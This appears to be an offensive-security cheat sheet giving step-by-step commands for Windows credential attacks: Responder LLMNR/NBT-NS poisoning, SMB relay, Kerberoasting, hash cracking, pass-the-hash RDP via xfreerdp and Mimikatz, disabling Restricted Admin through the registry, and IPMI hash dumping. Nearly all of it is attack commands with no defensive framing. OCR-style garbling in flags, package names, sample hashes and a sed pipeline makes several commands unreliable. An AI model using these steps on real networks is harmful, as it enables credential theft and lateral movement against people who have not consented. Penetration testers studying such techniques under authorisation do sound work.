Network Hashes

## RESPONDER REFERENCES: @PythonResponder https://github.com/lgandx/Responder.git @Evil_Mog https://github.com/evilmog/ntlmvl-multi @NotMedic https://github.com/NotMedic/NetNTLMtoSilverTicket (Free online NetNTLMvl cracking) https://crack.sh/netntlm/ Responder is an LLMNR, NBT-NS and MDNS poisoner and will answer to specific NBT NS queries on the network based on their name suffix. Responder listens on ports: UDP 53,137,138,389,1434 TCP 21,25,80,110,139,389,445,587,1433,3128,3141 and Multicast UDP 5553. ```bash python Responder.py •I <interface> ``` EXAMPLE HASHES ```bash (NTLMvl SSP Enabled Hash Example) hashcat::admin-SAA37877:85DSBC2CE95161CD00000000000000000000000000000000:892F905 962F76D323837F613F88DE27C2BBD6C9ABCD021D0:11223344556677BB (NTLMvl No-SSP Hash Example) hashcat::admin-SAA37877:76365E2D14285612980C67D057EB9EFEEESEF6EB6FF6E04D:727B4E 35F947129EA5289CDEDAE869348823EF89F50FC595:1122334455667788 (NTLMv2 Hash Example) admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966al53a0064958dac6:Sc7830315c78 30310000000000000b45c67103d07d7b95acdl2ffall230e0000000052920b85f78d013c31cdb3b9 2f5d765c783030 ``` Responder.conf - location for modifying various Responder configuration settings Target a specific IP address on the network and limit possible network disruptions edit the Responder.conf file value "RespondTo" and add the range 10.X.X.1-10 or host 10.X.X.2 you. Target a particular NBTS-NS/LLMNR name edit the Responder.conf file value "RespondToName" to a targeted spoof hostname e.g, SQLSERVER-01, FILESHARE02,... Use analyze mode '-A' when trying to gauge how noisy the target IP space may be in order to watch requests: ```bash python Responder.py -I <interface> -A ``` ### MULTI-RELAY w/ RESPONDER STEP 1: Disable HTTP & SMB servers by editing the Responder.conf file. STEP 2: RunFinger.py to check if host has SMB Signing: False RunFinger.py is located in the tools directory. this script allows you to verify if SMB Signing: False. SMB Signing being disabled is crucial for this relay attack, otherwise the target for relaying isn't vulnerable to this attack. ```bash python RunFinger.py -i 10.X.X.0/24 ``` STEP 3: Start Responder.py ```bash python Responder.py -I <interface> ``` STEP 4: Start Mult-Relay tool to route captured hashes to our Target IP. Caveat is that the user 0-u" target must be a local administrator on the host. ```bash python MultiRelay.py -t <Target IP> -u ALL ``` ••MacOS/ OSX Responder must be started with an IP address for the -i flag (e.g. -i YOUR_IP_ADDR). There is no native support in OSX for custom interface binding. Using -i enl will not work. Be sure to run the following commands as root to unload these possible running services and limit conflicts: ```bash launchctl unload /System/Library/LaunchDaemons/com.apple.Kerberos.kdc.plist launchctl unload /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist launchctl unload /System/Library/LaunchDaemons/com.apple.smbd.plist launchctl unload /System/Library/LaunchDaemons/com.apple.netbiosd.plist ``` ## KERBEROASTING SCENARIO: You've gained a foothold on the target network. You can now attempt to enumerate/harvest Kerberos Tickets to extract and crack user created accounts visible on the network. REFERENCES: https://room362.com/post/2016/kerberoast-ptl/ https://github.com/skelsec/kerberoast https://github.com/magnumripper/JohnTheRipper/blob/bleedingjumbo/run/kirbi2john.py STEP 1: Enumerate SPNs or ASREP on the network (Service Principle Names) which are used by Kerberos to auth to a service instance with a logon account. FYI you can use option °-n" to pass an NT hash instead of password. ```bash pip3 install kerberoast kerberoast.py ldap spn domain/username:password@OC_IPaddr -o spn_enum.txt ``` OR ASREP ```bash kerberoast.py ldap asrep domain/username:password@OC_IPaddr -o asrep_enum.txt ``` OR Manual Method ```bash C:\> setspn -t <domain> -q •t• ``` STEP 2: Request SPN Kerberos Tickets for accounts we want to target. FYI we can use a password, NT hash 0-n", or AES key 0 -a" on kerberoast.py. ```bash kerberoast.py spnroast <kerberos_realm>/username:password or NT_hash or AES_key>@<DC_IPaddr> -o kirbi_tix.txt ``` OR Manual Method ```powershell PS C:\> Add-Type -AssemblyName System.IdentityModel PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken ArgumentList "<kerberos_realm>" ``` STEP 3: Crack the target SPN tickets using John or Hashcat. Depending on collection method you may need to convert using kirbi2john.py. ```bash john --format=krbStgs kirbi_tix.txt --wordlist=dict.txt hashcat -a 0 -m 13100 -w 4 kirbi_tix.txt dict.txt hashcat -a 0 -m 18200 -w 4 kirbi5_aesrep_etype23_tix.txt dict.txt ``` If you need to manually convert kirbi2john to hashcat format try: ```bash cat kirbi2john_format.txt I sed 's/\$krb5tgs\$$.*$:$.*$/\$krb5tgs\$23\$\*\1\*\$\2/' ``` ## Windows RemoteDesktop XFREERDP Pass-The-Hash STEP 1: Install XFreeRDP client ```bash apt-get install freerdp-xll ``` STEP 2: Use the 'pth' option to Pass-The-Hash for an RDP session on a target: ```powershell xfreerdp /u:username /d:domain /pth:<NTLM Hash> /v:<IP Address> ``` ## MIMIKATZ Pass-The-Hash RDP STEP 1: Obtain local Admin on a machine STEP 2: Load and launch the following Mimikatz command: ```powershell sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM Hash> /run:"mstsc.exe /restrictedadmin" ``` STEP 3: In the RDP window enter the Domain/IPAddress of target machine. Done. !!!!!!!!!!!!!!!!!!!!!!!!!!If Restricted Admin Mode is enabled you can disable it through the following!!!!!!!!!!!!!!!!!!!!!!!!!! STEP 1: Execute PowerShell on the remote target machine: ```powershell mimikatz.exe "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM Hash> /run:powershell.exe" ``` STEP 2: In the new PowerShell window enter the following to disable Restricted Admin: ```powershell Enter-PSSession -ComputerName <Hostname> New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force ``` STEP 3: Now try the previous Mimikatz RDP pass-the-hash attack above. ## IPMI SCENARIO: You have found an open IPMI port 623 running Version 2.0. This version is vulnerable to dumping the stored user password hashes. STEP 1: Port 623 UDP needs to be open on the device. STEP 2: Load metasploit module and configure options to dump the IPMI hashes: ```bash use auxiliary/scanner/ipmi/ipmi_dumphashes set verbose true set RHOSTS <Target_IPAddr> run ``` STEP 3: Collect hashes into hash.txt file and attempt to crack with Hashcat mode 7300: ```bash hashcat -a 0 -m 7300 hash.txt dict.txt ``` [[Home]] #tools #howto